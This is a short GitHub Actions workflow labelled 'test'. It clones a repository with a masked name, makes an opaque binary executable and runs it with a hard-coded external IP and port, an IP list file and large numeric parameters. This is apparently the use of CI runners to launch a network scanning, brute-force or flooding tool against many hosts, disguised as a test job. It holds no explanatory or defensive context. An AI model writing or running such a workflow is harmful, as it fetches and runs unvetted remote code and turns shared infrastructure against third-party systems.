name: test

on: [workflow_dispatch]

jobs:
  execute:
    runs-on: ubuntu-latest
    
    steps:
    - name: Setup and Run
      run: |
        apt update && apt install -y gcc wget
        git clone https://github.com/XSADAX/XXXXXX.git ./target-repo
        cd ./target-repo
        chmod +x index
        ./index 196.251.84.177:33060 iplist.txt 30000 9999